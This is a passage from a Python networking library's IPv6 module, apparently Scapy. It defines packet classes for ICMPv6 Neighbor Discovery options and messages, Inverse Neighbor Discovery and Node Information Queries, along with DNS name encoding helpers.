1770 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py 

1771 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py 

1772 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py 

1773 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py 

1774 # 15: Do Me, 

1775 # 16: Do Me, 

1776 17: "ICMPv6NDOptIPAddr", 

1777 18: "ICMPv6NDOptNewRtrPrefix", 

1778 19: "ICMPv6NDOptLLA", 

1779 # 18: Do Me, 

1780 # 19: Do Me, 

1781 # 20: Do Me, 

1782 # 21: Do Me, 

1783 # 22: Do Me, 

1784 23: "ICMPv6NDOptMAP", 

1785 24: "ICMPv6NDOptRouteInfo", 

1786 25: "ICMPv6NDOptRDNSS", 

1787 26: "ICMPv6NDOptEFA", 

1788 31: "ICMPv6NDOptDNSSL", 

1789 37: "ICMPv6NDOptCaptivePortal", 

1790 38: "ICMPv6NDOptPREF64", 

1791 } 

1792 

1793icmp6ndraprefs = {0: "Medium (default)", 

1794 1: "High", 

1795 2: "Reserved", 

1796 3: "Low"} # RFC 4191 

1797 

1798 

1799class _ICMPv6NDGuessPayload: 

1800 name = "Dummy ND class that implements guess_payload_class()" 

1801 

1802 def guess_payload_class(self, p): 

1803 if len(p) > 1: 

1804 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown) 

1805 

1806 

1807# Beginning of ICMPv6 Neighbor Discovery Options. 

1808 

1809class ICMPv6NDOptDataField(StrLenField): 

1810 __slots__ = ["strip_zeros"] 

1811 

1812 def __init__(self, name, default, strip_zeros=False, **kwargs): 

1813 super().__init__(name, default, **kwargs) 

1814 self.strip_zeros = strip_zeros 

1815 

1816 def i2len(self, pkt, x): 

1817 return len(self.i2m(pkt, x)) 

1818 

1819 def i2m(self, pkt, x): 

1820 r = (len(x) + 2) % 8 

1821 if r: 

1822 x += b"\x00" * (8 - r) 

1823 return x 

1824 

1825 def m2i(self, pkt, x): 

1826 if self.strip_zeros: 

1827 x = x.rstrip(b"\x00") 

1828 return x 

1829 

1830 

1831class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): 

1832 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" 

1833 fields_desc = [ByteField("type", 0), 

1834 FieldLenField("len", None, length_of="data", fmt="B", 

1835 adjust=lambda pkt, x: (2 + x) // 8), 

1836 ICMPv6NDOptDataField("data", "", strip_zeros=False, 

1837 length_from=lambda pkt: 

1838 8 * max(pkt.len, 1) - 2)] 

1839 

1840# NOTE: len includes type and len field. Expressed in unit of 8 bytes 

1841# TODO: Revoir le coup du ETHER_ANY 

1842 

1843 

1844class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): 

1845 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" 

1846 fields_desc = [ByteField("type", 1), 

1847 ByteField("len", 1), 

1848 SourceMACField("lladdr")] 

1849 

1850 def mysummary(self): 

1851 return self.sprintf("%name% %lladdr%") 

1852 

1853 

1854class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): 

1855 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" 

1856 type = 2 

1857 

1858 

1859class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): 

1860 name = "ICMPv6 Neighbor Discovery Option - Prefix Information" 

1861 fields_desc = [ByteField("type", 3), 

1862 ByteField("len", 4), 

1863 ByteField("prefixlen", 64), 

1864 BitField("L", 1, 1), 

1865 BitField("A", 1, 1), 

1866 BitField("R", 0, 1), 

1867 BitField("res1", 0, 5), 

1868 XIntField("validlifetime", 0xffffffff), 

1869 XIntField("preferredlifetime", 0xffffffff), 

1870 XIntField("res2", 0x00000000), 

1871 IP6Field("prefix", "::")] 

1872 

1873 def mysummary(self): 

1874 return self.sprintf("%name% %prefix%/%prefixlen% " 

1875 "On-link %L% Autonomous Address %A% " 

1876 "Router Address %R%") 

1877 

1878# TODO: We should also limit the size of included packet to something 

1879# like (initiallen - 40 - 2) 

1880 

1881 

1882class TruncPktLenField(PacketLenField): 

1883 def i2m(self, pkt, x): 

1884 s = bytes(x) 

1885 tmp_len = len(s) 

1886 return s[:tmp_len - (tmp_len % 8)] 

1887 

1888 def i2len(self, pkt, i): 

1889 return len(self.i2m(pkt, i)) 

1890 

1891 

1892class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): 

1893 name = "ICMPv6 Neighbor Discovery Option - Redirected Header" 

1894 fields_desc = [ByteField("type", 4), 

1895 FieldLenField("len", None, length_of="pkt", fmt="B", 

1896 adjust=lambda pkt, x: (x + 8) // 8), 

1897 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)), 

1898 TruncPktLenField("pkt", b"", IPv6, 

1899 length_from=lambda pkt: 8 * pkt.len - 8)] 

1900 

1901# See which value should be used for default MTU instead of 1280 

1902 

1903 

1904class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): 

1905 name = "ICMPv6 Neighbor Discovery Option - MTU" 

1906 fields_desc = [ByteField("type", 5), 

1907 ByteField("len", 1), 

1908 XShortField("res", 0), 

1909 IntField("mtu", 1280)] 

1910 

1911 def mysummary(self): 

1912 return self.sprintf("%name% %mtu%") 

1913 

1914 

1915class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 

1916 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" 

1917 fields_desc = [ByteField("type", 6), 

1918 ByteField("len", 1), 

1919 ByteField("shortcutlim", 40), # XXX 

1920 ByteField("res1", 0), 

1921 IntField("res2", 0)] 

1922 

1923 

1924class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): 

1925 name = "ICMPv6 Neighbor Discovery - Interval Advertisement" 

1926 fields_desc = [ByteField("type", 7), 

1927 ByteField("len", 1), 

1928 ShortField("res", 0), 

1929 IntField("advint", 0)] 

1930 

1931 def mysummary(self): 

1932 return self.sprintf("%name% %advint% milliseconds") 

1933 

1934 

1935class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): 

1936 name = "ICMPv6 Neighbor Discovery - Home Agent Information" 

1937 fields_desc = [ByteField("type", 8), 

1938 ByteField("len", 1), 

1939 ShortField("res", 0), 

1940 ShortField("pref", 0), 

1941 ShortField("lifetime", 1)] 

1942 

1943 def mysummary(self): 

1944 return self.sprintf("%name% %pref% %lifetime% seconds") 

1945 

1946# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 

1947 

1948# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 

1949 

1950 

1951class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1952 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" 

1953 fields_desc = [ByteField("type", 17), 

1954 ByteField("len", 3), 

1955 ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 

1956 2: "New Care-Of Address", 

1957 3: "NAR's IP address"}), 

1958 ByteField("plen", 64), 

1959 IntField("res", 0), 

1960 IP6Field("addr", "::")] 

1961 

1962 

1963class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1964 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 

1965 fields_desc = [ByteField("type", 18), 

1966 ByteField("len", 3), 

1967 ByteField("optcode", 0), 

1968 ByteField("plen", 64), 

1969 IntField("res", 0), 

1970 IP6Field("prefix", "::")] 

1971 

1972 

1973_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 

1974 1: "LLA for the new AP", 

1975 2: "LLA of the MN", 

1976 3: "LLA of the NAR", 

1977 4: "LLA of the src of TrSolPr or PrRtAdv msg", 

1978 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 

1979 6: "No preifx info available for AP identified by the LLA", # noqa: E501 

1980 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 

1981 

1982 

1983class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1984 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 

1985 fields_desc = [ByteField("type", 19), 

1986 ByteField("len", 1), 

1987 ByteEnumField("optcode", 0, _rfc4068_lla_optcode), 

1988 MACField("lla", ETHER_ANY)] # We only support ethernet 

1989 

1990 

1991class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 

1992 name = "ICMPv6 Neighbor Discovery - MAP Option" 

1993 fields_desc = [ByteField("type", 23), 

1994 ByteField("len", 3), 

1995 BitField("dist", 1, 4), 

1996 BitField("pref", 15, 4), # highest availability 

1997 BitField("R", 1, 1), 

1998 BitField("res", 0, 7), 

1999 IntField("validlifetime", 0xffffffff), 

2000 IP6Field("addr", "::")] 

2001 

2002 

2003class _IP6PrefixField(IP6Field): 

2004 __slots__ = ["length_from"] 

2005 

2006 def __init__(self, name, default): 

2007 IP6Field.__init__(self, name, default) 

2008 self.length_from = lambda pkt: 8 * (pkt.len - 1) 

2009 

2010 def addfield(self, pkt, s, val): 

2011 return s + self.i2m(pkt, val) 

2012 

2013 def getfield(self, pkt, s): 

2014 tmp_len = self.length_from(pkt) 

2015 p = s[:tmp_len] 

2016 if tmp_len < 16: 

2017 p += b'\x00' * (16 - tmp_len) 

2018 return s[tmp_len:], self.m2i(pkt, p) 

2019 

2020 def i2len(self, pkt, x): 

2021 return len(self.i2m(pkt, x)) 

2022 

2023 def i2m(self, pkt, x): 

2024 tmp_len = pkt.len 

2025 

2026 if x is None: 

2027 x = "::" 

2028 if tmp_len is None: 

2029 tmp_len = 1 

2030 x = inet_pton(socket.AF_INET6, x) 

2031 

2032 if tmp_len is None: 

2033 return x 

2034 if tmp_len in [0, 1]: 

2035 return b"" 

2036 if tmp_len in [2, 3]: 

2037 return x[:8 * (tmp_len - 1)] 

2038 

2039 return x + b'\x00' * 8 * (tmp_len - 3) 

2040 

2041 

2042class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 

2043 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" 

2044 fields_desc = [ByteField("type", 24), 

2045 FieldLenField("len", None, length_of="prefix", fmt="B", 

2046 adjust=lambda pkt, x: x // 8 + 1), 

2047 ByteField("plen", None), 

2048 BitField("res1", 0, 3), 

2049 BitEnumField("prf", 0, 2, icmp6ndraprefs), 

2050 BitField("res2", 0, 3), 

2051 IntField("rtlifetime", 0xffffffff), 

2052 _IP6PrefixField("prefix", None)] 

2053 

2054 def mysummary(self): 

2055 return self.sprintf("%name% %prefix%/%plen% Preference %prf%") 

2056 

2057 

2058class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 

2059 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 

2060 fields_desc = [ByteField("type", 25), 

2061 FieldLenField("len", None, count_of="dns", fmt="B", 

2062 adjust=lambda pkt, x: 2 * x + 1), 

2063 ShortField("res", None), 

2064 IntField("lifetime", 0xffffffff), 

2065 IP6ListField("dns", [], 

2066 length_from=lambda pkt: 8 * (pkt.len - 1))] 

2067 

2068 def mysummary(self): 

2069 return self.sprintf("%name% ") + ", ".join(self.dns) 

2070 

2071 

2072class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) 

2073 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" 

2074 fields_desc = [ByteField("type", 26), 

2075 ByteField("len", 1), 

2076 BitField("res", 0, 48)] 

2077 

2078# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 

2079# described in section 3.1 of RFC 1035 

2080# XXX Label should be at most 63 octets in length : we do not enforce it 

2081# Total length of domain should be 255 : we do not enforce it either 

2082 

2083 

2084class DomainNameListField(StrLenField): 

2085 __slots__ = ["padded"] 

2086 islist = 1 

2087 padded_unit = 8 

2088 

2089 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 

2090 self.padded = padded 

2091 StrLenField.__init__(self, name, default, length_from=length_from) 

2092 

2093 def i2len(self, pkt, x): 

2094 return len(self.i2m(pkt, x)) 

2095 

2096 def i2h(self, pkt, x): 

2097 if not x: 

2098 return [] 

2099 return x 

2100 

2101 def m2i(self, pkt, x): 

2102 x = plain_str(x) # Decode bytes to string 

2103 res = [] 

2104 while x: 

2105 # Get a name until \x00 is reached 

2106 cur = [] 

2107 while x and ord(x[0]) != 0: 

2108 tmp_len = ord(x[0]) 

2109 cur.append(x[1:tmp_len + 1]) 

2110 x = x[tmp_len + 1:] 

2111 if self.padded: 

2112 # Discard following \x00 in padded mode 

2113 if len(cur): 

2114 res.append(".".join(cur) + ".") 

2115 else: 

2116 # Store the current name 

2117 res.append(".".join(cur) + ".") 

2118 if x and ord(x[0]) == 0: 

2119 x = x[1:] 

2120 return res 

2121 

2122 def i2m(self, pkt, x): 

2123 def conditionalTrailingDot(z): 

2124 if z and orb(z[-1]) == 0: 

2125 return z 

2126 return z + b'\x00' 

2127 # Build the encode names 

2128 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 

2129 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) 

2130 

2131 # In padded mode, add some \x00 bytes 

2132 if self.padded and not len(ret_string) % self.padded_unit == 0: 

2133 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 

2134 

2135 return ret_string 

2136 

2137 

2138class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 

2139 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" 

2140 fields_desc = [ByteField("type", 31), 

2141 FieldLenField("len", None, length_of="searchlist", fmt="B", 

2142 adjust=lambda pkt, x: 1 + x // 8), 

2143 ShortField("res", None), 

2144 IntField("lifetime", 0xffffffff), 

2145 DomainNameListField("searchlist", [], 

2146 length_from=lambda pkt: 8 * pkt.len - 8, 

2147 padded=True) 

2148 ] 

2149 

2150 def mysummary(self): 

2151 return self.sprintf("%name% ") + ", ".join(self.searchlist) 

2152 

2153 

2154class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910 

2155 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option" 

2156 fields_desc = [ByteField("type", 37), 

2157 FieldLenField("len", None, length_of="URI", fmt="B", 

2158 adjust=lambda pkt, x: (2 + x) // 8), 

2159 ICMPv6NDOptDataField("URI", "", strip_zeros=True, 

2160 length_from=lambda pkt: 

2161 8 * max(pkt.len, 1) - 2)] 

2162 

2163 def mysummary(self): 

2164 return self.sprintf("%name% %URI%") 

2165 

2166 

2167class _PREF64(IP6Field): 

2168 def addfield(self, pkt, s, val): 

2169 return s + self.i2m(pkt, val)[:12] 

2170 

2171 def getfield(self, pkt, s): 

2172 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4) 

2173 

2174 

2175class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781 

2176 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option" 

2177 fields_desc = [ByteField("type", 38), 

2178 ByteField("len", 2), 

2179 BitField("scaledlifetime", 0, 13), 

2180 BitEnumField("plc", 0, 3, 

2181 ["/96", "/64", "/56", "/48", "/40", "/32"]), 

2182 _PREF64("prefix", "::")] 

2183 

2184 def mysummary(self): 

2185 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]" 

2186 return self.sprintf("%name% %prefix%") + plc 

2187 

2188# End of ICMPv6 Neighbor Discovery Options. 

2189 

2190 

2191class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): 

2192 name = "ICMPv6 Neighbor Discovery - Router Solicitation" 

2193 fields_desc = [ByteEnumField("type", 133, icmp6types), 

2194 ByteField("code", 0), 

2195 XShortField("cksum", None), 

2196 IntField("res", 0)] 

2197 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} 

2198 

2199 

2200class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): 

2201 name = "ICMPv6 Neighbor Discovery - Router Advertisement" 

2202 fields_desc = [ByteEnumField("type", 134, icmp6types), 

2203 ByteField("code", 0), 

2204 XShortField("cksum", None), 

2205 ByteField("chlim", 0), 

2206 BitField("M", 0, 1), 

2207 BitField("O", 0, 1), 

2208 BitField("H", 0, 1), 

2209 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 

2210 BitField("P", 0, 1), 

2211 BitField("res", 0, 2), 

2212 ShortField("routerlifetime", 1800), 

2213 IntField("reachabletime", 0), 

2214 IntField("retranstimer", 0)] 

2215 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2216 

2217 def answers(self, other): 

2218 return isinstance(other, ICMPv6ND_RS) 

2219 

2220 def mysummary(self): 

2221 return self.sprintf("%name% Lifetime %routerlifetime% " 

2222 "Hop Limit %chlim% Preference %prf% " 

2223 "Managed %M% Other %O% Home %H%") 

2224 

2225 

2226class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2227 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" 

2228 fields_desc = [ByteEnumField("type", 135, icmp6types), 

2229 ByteField("code", 0), 

2230 XShortField("cksum", None), 

2231 IntField("res", 0), 

2232 IP6Field("tgt", "::")] 

2233 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2234 

2235 def mysummary(self): 

2236 return self.sprintf("%name% (tgt: %tgt%)") 

2237 

2238 def hashret(self): 

2239 return bytes_encode(self.tgt) + self.payload.hashret() 

2240 

2241 

2242class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2243 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" 

2244 fields_desc = [ByteEnumField("type", 136, icmp6types), 

2245 ByteField("code", 0), 

2246 XShortField("cksum", None), 

2247 BitField("R", 1, 1), 

2248 BitField("S", 0, 1), 

2249 BitField("O", 1, 1), 

2250 XBitField("res", 0, 29), 

2251 IP6Field("tgt", "::")] 

2252 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2253 

2254 def mysummary(self): 

2255 return self.sprintf("%name% (tgt: %tgt%)") 

2256 

2257 def hashret(self): 

2258 return bytes_encode(self.tgt) + self.payload.hashret() 

2259 

2260 def answers(self, other): 

2261 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt 

2262 

2263# associated possible options : target link-layer option, Redirected header 

2264 

2265 

2266class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2267 name = "ICMPv6 Neighbor Discovery - Redirect" 

2268 fields_desc = [ByteEnumField("type", 137, icmp6types), 

2269 ByteField("code", 0), 

2270 XShortField("cksum", None), 

2271 XIntField("res", 0), 

2272 IP6Field("tgt", "::"), 

2273 IP6Field("dst", "::")] 

2274 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2275 

2276 

2277# ICMPv6 Inverse Neighbor Discovery (RFC 3122) # 

2278 

2279class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): 

2280 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" 

2281 fields_desc = [ByteField("type", 9), 

2282 FieldLenField("len", None, count_of="addrlist", fmt="B", 

2283 adjust=lambda pkt, x: 2 * x + 1), 

2284 StrFixedLenField("res", b"\x00" * 6, 6), 

2285 IP6ListField("addrlist", [], 

2286 length_from=lambda pkt: 8 * (pkt.len - 1))] 

2287 

2288 

2289class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): 

2290 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" 

2291 type = 10 

2292 

2293 

2294# RFC3122 

2295# Options requises : source lladdr et target lladdr 

2296# Autres options valides : source address list, MTU 

2297# - Comme precise dans le document, il serait bien de prendre l'adresse L2 

2298# demandee dans l'option requise target lladdr et l'utiliser au niveau 

2299# de l'adresse destination ethernet si aucune adresse n'est precisee 

2300# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes 

2301# les options. 

2302# Ether() must use the target lladdr as destination 

2303class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): 

2304 name = "ICMPv6 Inverse Neighbor Discovery Solicitation" 

2305 fields_desc = [ByteEnumField("type", 141, icmp6types), 

2306 ByteField("code", 0), 

2307 XShortField("cksum", None), 

2308 XIntField("reserved", 0)] 

2309 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2310 

2311# Options requises : target lladdr, target address list 

2312# Autres options valides : MTU 

2313 

2314 

2315class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): 

2316 name = "ICMPv6 Inverse Neighbor Discovery Advertisement" 

2317 fields_desc = [ByteEnumField("type", 142, icmp6types), 

2318 ByteField("code", 0), 

2319 XShortField("cksum", None), 

2320 XIntField("reserved", 0)] 

2321 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2322 

2323 

2324############################################################################### 

2325# ICMPv6 Node Information Queries (RFC 4620) 

2326############################################################################### 

2327 

2328# [ ] Add automatic destination address computation using computeNIGroupAddr 

2329# in IPv6 class (Scapy6 modification when integrated) if : 

2330# - it is not provided 

2331# - upper layer is ICMPv6NIQueryName() with a valid value 

2332# [ ] Try to be liberal in what we accept as internal values for _explicit_ 

2333# DNS elements provided by users. Any string should be considered 

2334# valid and kept like it has been provided. At the moment, i2repr() will 

2335# crash on many inputs 

2336# [ ] Do the documentation 

2337# [ ] Add regression tests 

2338# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 

2339# [ ] Check if there are differences between different stacks. Among *BSD, 

2340# with others. 

2341# [ ] Deal with flags in a consistent way. 

2342# [ ] Implement compression in names2dnsrepr() and decompresiion in 

2343# dnsrepr2names(). Should be deactivable. 

2344 

2345icmp6_niqtypes = {0: "NOOP", 

2346 2: "Node Name", 

2347 3: "IPv6 Address", 

2348 4: "IPv4 Address"} 

2349 

2350 

2351class _ICMPv6NIHashret: 

2352 def hashret(self): 

2353 return bytes_encode(self.nonce) 

2354 

2355 

2356class _ICMPv6NIAnswers: 

2357 def answers(self, other): 

2358 return self.nonce == other.nonce 

2359 

2360# Buggy; always returns the same value during a session 

2361 

2362 

2363class NonceField(StrFixedLenField): 

2364 def __init__(self, name, default=None): 

2365 StrFixedLenField.__init__(self, name, default, 8) 

2366 if default is None: 

2367 self.default = self.randval() 

2368 

2369 

2370@conf.commands.register 

2371def computeNIGroupAddr(name): 

2372 """Compute the NI group Address. Can take a FQDN as input parameter""" 

2373 name = name.lower().split(".")[0] 

2374 record = chr(len(name)) + name 

2375 h = md5(record.encode("utf8")) 

2376 h = h.digest() 

2377 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) 

2378 return addr 

2379 

2380 

2381# Here is the deal. First, that protocol is a piece of shit. Then, we 

2382# provide 4 classes for the different kinds of Requests (one for every 

2383# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 

2384# data field class that is made to be smart by guessing the specific 

2385# type of value provided : 

2386# 

2387# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 

2388# if not overridden by user 

2389# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 

2390# if not overridden 

2391# - Name in the other cases: code is set to 0, if not overridden by user 

2392# 

2393# Internal storage, is not only the value, but the a pair providing 

2394# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) 

2395# 

2396# Note : I merged getfield() and m2i(). m2i() should not be called 

2397# directly anyway. Same remark for addfield() and i2m() 

2398# 

2399# -- arno 

2400 

2401# "The type of information present in the Data field of a query is 

2402# declared by the ICMP Code, whereas the type of information in a 

2403# Reply is determined by the Qtype" 

2404 

2405def names2dnsrepr(x): 

2406 """ 

2407 Take as input a list of DNS names or a single DNS name 

2408 and encode it in DNS format (with possible compression) 

2409 If a string that is already a DNS name in DNS format 

2410 is passed, it is returned unmodified. Result is a string. 

2411 !!! At the moment, compression is not implemented !!! 

2412 """ 

2413 

2414 if isinstance(x, bytes): 

2415 if x and x[-1:] == b'\x00': # stupid heuristic 

2416 return x 

2417 x = [x] 

2418 

2419 res = [] 

2420 for n in x: 

2421 termin = b"\x00" 

2422 if n.count(b'.') == 0: # single-component gets one more 

2423 termin += b'\x00' 

2424 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin 

2425 res.append(n) 

2426 return b"".join(res) 

2427 

2428 

2429def dnsrepr2names(x): 

2430 """ 

2431 Take as input a DNS encoded string (possibly compressed) 

2432 and returns a list of DNS names contained in it. 

2433 If provided string is already in printable format 

2434 (does not end with a null character, a one element list 

2435 is returned). Result is a list. 

2436 """ 

2437 res = [] 

2438 cur = b"" 

2439 while x: 

2440 tmp_len = orb(x[0]) 

2441 x = x[1:] 

2442 if not tmp_len: 

2443 if cur and cur[-1:] == b'.': 

2444 cur = cur[:-1] 

2445 res.append(cur) 

2446 cur = b"" 

2447 if x and orb(x[0]) == 0: # single component 

2448 x = x[1:] 

2449 continue 

2450 if tmp_len & 0xc0: # XXX TODO : work on that -- arno 

2451 raise Exception("DNS message can't be compressed at this point!") 

2452 cur += x[:tmp_len] + b"." 

2453 x = x[tmp_len:] 

2454 return res 

2455 

2456 

2457class NIQueryDataField(StrField): 

2458 def __init__(self, name, default): 

2459 StrField.__init__(self, name, default) 

2460 

2461 def i2h(self, pkt, x): 

2462 if x is None: 

2463 return x 

2464 t, val = x 

2465 if t == 1: 

2466 val = dnsrepr2names(val)[0] 

2467 return val 

2468 

2469 def h2i(self, pkt, x): 

2470 if x is tuple and isinstance(x[0], int): 

2471 return x 

2472 

2473 # Try IPv6 

2474 try: 

2475 inet_pton(socket.AF_INET6, x.decode()) 

2476 return (0, x.decode()) 

2477 except Exception: 

2478 pass 

2479 # Try IPv4 

2480 try: 

2481 inet_pton(socket.AF_INET, x.decode()) 

2482 return (2, x.decode()) 

2483 except Exception: 

2484 pass 

2485 # Try DNS 

2486 if x is None: 

2487 x = b"" 

2488 x = names2dnsrepr(x) 

2489 return (1, x) 

2490 

2491 def i2repr(self, pkt, x): 

2492 t, val = x 

2493 if t == 1: # DNS Name 

2494 # we don't use dnsrepr2names() to deal with 

2495 # possible weird data extracted info 

2496 res = [] 

2497 while val: 

2498 tmp_len = orb(val[0]) 

2499 val = val[1:] 

2500 if tmp_len == 0: 

2501 break 

2502 res.append(plain_str(val[:tmp_len]) + ".") 

2503 val = val[tmp_len:] 

2504 tmp = "".join(res) 

2505 if tmp and tmp[-1] == '.': 

2506 tmp = tmp[:-1] 

2507 return tmp 

2508 return repr(val) 

2509 

2510 def getfield(self, pkt, s): 

2511 qtype = getattr(pkt, "qtype") 

2512 if qtype == 0: # NOOP 

2513 return s, (0, b"") 

2514 else: 

2515 code = getattr(pkt, "code") 

2516 if code == 0: # IPv6 Addr 

2517 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) 

2518 elif code == 2: # IPv4 Addr 

2519 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) 

2520 else: # Name or Unknown 

2521 return b"", (1, s) 

2522 

2523 def addfield(self, pkt, s, val): 

2524 if ((isinstance(val, tuple) and val[1] is None) or 

2525 val is None): 

2526 val = (1, b"") 

2527 t = val[0] 

2528 if t == 1: 

2529 return s + val[1] 

2530 elif t == 0: 

2531 return s + inet_pton(socket.AF_INET6, val[1]) 

2532 else: 

2533 return s + inet_pton(socket.AF_INET, val[1]) 

2534 

2535 

2536class NIQueryCodeField(ByteEnumField): 

2537 def i2m(self, pkt, x): 

2538 if x is None: 

2539 d = pkt.getfieldval("data") 

2540 if d is None: 

2541 return 1 

2542 elif d[0] == 0: # IPv6 address 

2543 return 0 

2544 elif d[0] == 1: # Name 

2545 return 1 

2546 elif d[0] == 2: # IPv4 address 

2547 return 2 

2548 else: 

2549 return 1 

2550 return x 

2551 

2552 

2553_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} 

2554 

2555# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 

2556# 8: "Link-local addresses", 16: "Site-local addresses", 

2557# 32: "Global addresses" } 

2558 

2559# "This NI type has no defined flags and never has a Data Field". Used 

2560# to know if the destination is up and implements NI protocol. 

2561 

2562 

2563class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): 

2564 name = "ICMPv6 Node Information Query - NOOP Query" 

2565 fields_desc = [ByteEnumField("type", 139, icmp6types), 

2566 NIQueryCodeField("code", None, _niquery_code), 

2567 XShortField("cksum", None), 

2568 ShortEnumField("qtype", 0, icmp6_niqtypes), 

2569 BitField("unused", 0, 10), 

2570 FlagsField("flags", 0, 6, "TACLSG"), 

2571 NonceField("nonce", None), 

2572 NIQueryDataField("data", None)] 

2573 

2574 

2575class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): 

2576 name = "ICMPv6 Node Information Query - IPv6 Name Query" 

2577 qtype = 2 

2578 

2579# We ask for the IPv6 address of the peer 

2580 

2581 

2582class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): 

2583 name = "ICMPv6 Node Information Query - IPv6 Address Query" 

2584 qtype = 3 

2585 flags = 0x3E 

2586 

2587 

2588class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): 

2589 name = "ICMPv6 Node Information Query - IPv4 Address Query" 

2590 qtype = 4 

2591 

2592 

